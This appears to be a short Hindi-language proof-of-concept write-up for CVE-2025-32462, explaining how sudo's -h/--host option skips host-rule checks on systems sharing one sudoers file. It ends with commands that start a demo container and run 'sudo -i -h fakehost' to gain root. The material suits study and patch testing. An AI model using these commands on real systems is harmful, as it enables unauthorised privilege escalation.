
cve-2025-32462' डेमो

sudo/NEWS at SUDO_1_8_8 · sudo-project/sudo · GitHub
sudo -h (--host) के दस्तावेज़ में लिखा है कि -h केवल -l के साथ ही उपयोग किया जा सकता है। बाद के अपडेट में sudo -h को -e, -i आदि के साथ भी उपयोग करने दिया गया।
sudo --host(-h) <username> -l(--list)
/etc/sudoer.d का उपयोग यह देखने के लिए किया जाता है कि किसी उपयोगकर्ता के पास सिस्टम में क्या अनुमतियाँ हैं। इन अनुमतियों को दरकिनार किया जा सकता है, जिससे एक उपयोगकर्ता एक सिस्टम पर अपने अधिकारों को बढ़ाकर दूसरे सिस्टम पर प्राप्त होने वाले अधिकार प्राप्त कर सकता है। यह विशेष रूप से उन सिस्टमों को प्रभावित करता है जो कई कंप्यूटरों के बीच एक ही sudoers कॉन्फ़िगरेशन फ़ाइल साझा करते हैं या नेटवर्क-आधारित उपयोगकर्ता निर्देशिकाओं (जैसे LDAP) का उपयोग करके sudoers नियम प्रदान करते हैं।
संक्षेप में: sudo का h/--host विकल्प न्यूनतम विशेषाधिकार सिद्धांत का पालन नहीं करता है, और गैर--l परिदृश्यों (जैसे कमांड निष्पादन) में होस्ट नियम सीमाओं को सत्यापित नहीं करता है। हमलावर /etc/sudoer.d फ़ाइल में दुर्भावनापूर्ण नियम कॉन्फ़िगर कर सकते हैं।
मुख्य रूप से उन सिस्टम प्रशासकों के सिस्टम को प्रभावित करता है जो कई मशीनों पर एक ही sudoers फ़ाइल का उपयोग करते हैं।
भेद्यता हमले के लिए दो आवश्यकताओं को पूरा करना होगा:
उदाहरण:
sudoers फ़ाइल में नियम हैं जो विभिन्न सिस्टमों पर उपयोगकर्ता के अधिकारों को परिभाषित करते हैं।
Alice hostA: कुछ विशेषाधिकार
Bob hostB: कुछ विशेषाधिकार
Bob hostA में लॉग इन करता है, फिर sudo -h hostB commandA कमांड चलाता है।
git clone https://github.com/SpongeBob-369/cve-2025-32462.git
cd cve-2025-32462
chmod +x run.sh
./run.sh
# after entering the contain Ubuntu
sudo -l
# then prompt you to enter your password, but "we" don't know.
sudo -l -h fakehost # Check the permissions user ubuntu have in host named fakehost
sudo -i -h fakehost # get root